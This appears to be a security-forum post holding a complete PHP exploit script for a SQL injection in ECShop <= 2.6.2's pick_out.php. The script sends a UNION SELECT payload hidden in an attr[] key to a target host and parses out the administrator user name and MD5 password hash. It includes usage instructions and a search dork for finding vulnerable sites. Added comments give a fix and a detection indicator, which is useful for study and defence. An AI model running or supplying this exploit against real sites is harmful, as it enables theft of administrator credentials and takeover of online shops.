[Bug&安全&补丁] [ bug] ECShop <= v2.6.2 SQL injection / admin credentials
- #!/usr/bin/php
- <?php
- // This program is for technical exchange only; please do not use it for illegal purposes!!
- //
- // Proof-of-concept for the ECShop <= v2.6.2 SQL injection in pick_out.php.
- // The request built in send() places SQL inside a key of the `attr[]` query
- // array, which vulnerable releases apparently interpolate into a query
- // unescaped (inferred from the payload; the ECShop source is not on this page).
- // Defender's note: the application-side fix is to cast/whitelist attribute ids
- // and use parameterised queries; the response pattern matched below
- // (`IN (name:md5)`) is the signature a WAF or log review can look for.
- print_r('
- +---------------------------------------------------------------------------+
- ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
- by puret_t
- mail: puretot at gmail dot com
- team: http://bbs.wolvez.org
- dork: "Powered by ECShop"
- +---------------------------------------------------------------------------+
- ');
- /**
- * works with magic_quotes_gpc = Off
- *
- * The payload contains a literal single quote (%27); with magic_quotes_gpc
- * enabled the target would backslash-escape it and the injection fails.
- * magic_quotes is not a fix, though -- it was removed in PHP 5.4.
- */
- // Two positional arguments are required: host and path. Neither is validated.
- if ($argc < 3) {
- print_r('
- +---------------------------------------------------------------------------+
- Usage: php '.$argv[0].' host path
- host: target server (ip/hostname)
- path: path to ecshop
- Example:
- php '.$argv[0].' localhost /ecshop/
- +---------------------------------------------------------------------------+
- ');
- exit;
- }
- // 7 == E_ERROR | E_WARNING | E_PARSE; notices are hidden.
- error_reporting(7);
- // No script time limit (the socket read below blocks until EOF).
- ini_set('max_execution_time', 0);
- // Read by send() through `global`; path is used verbatim, so it is expected
- // to end with a slash (see the usage example).
- $host = $argv[1];
- $path = $argv[2];
- $resp = send();
- // Look for "IN (<user_name>:<32 lowercase hex chars>)" in the raw response;
- // $hash[1] is the admin user name, $hash[2] the 32-character hash.
- preg_match('#IN\s\(([\S]+):([a-z0-9]{32})\)#', $resp, $hash);
- // preg_match leaves $hash empty when there is no match, so the else branch
- // also covers a failed connection (send() then returns '').
- if ($hash)
- exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
- else
- exit("Exploit Failed!\n");
- /**
- * Sends one raw HTTP/1.1 GET to <path>pick_out.php on the target and returns
- * the complete raw response (status line and headers included) as a string.
- *
- * Reads $host and $path from the globals set by the top-level script.
- * Port 80 is hard-coded and the connection is plain TCP (no TLS).
- * The fsockopen() result is not checked: on a connection failure $fp is
- * false, the read loop is skipped and an empty string is returned, which
- * the caller reports as "Exploit Failed!". The socket is never closed
- * explicitly; it is released when the script exits.
- *
- * @return string raw HTTP response, or '' when the connection failed
- */
- function send()
- {[hide]
- global $host, $path;
- // URL-encoded query string: cat_id is a placeholder; the `attr[...]` key
- // carries the injected SQL. Defenders: a request with SQL keywords inside
- // an `attr[` key of pick_out.php is the indicator to alert on.
- $cmd = 'cat_id=999999&attr[%27%20UNION%20SELECT%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20WHERE%20action_list%3d%27all%27%20LIMIT%201%23]=ryat';
- $data = "GET ".$path."pick_out.php?".$cmd." HTTP/1.1\r\n";
- $data .= "Host: $host\r\n";
- // "Connection: Close" makes the server end the stream, so the loop below
- // can read until EOF instead of parsing Content-Length.
- $data .= "Connection: Close\r\n\r\n";
- $fp = fsockopen($host, 80);
- fputs($fp, $data);
- $resp = '';
- // Accumulate the response in 1024-byte chunks until EOF.
- while ($fp && !feof($fp))
- $resp .= fread($fp, 1024);
- return $resp;
- }
- ?>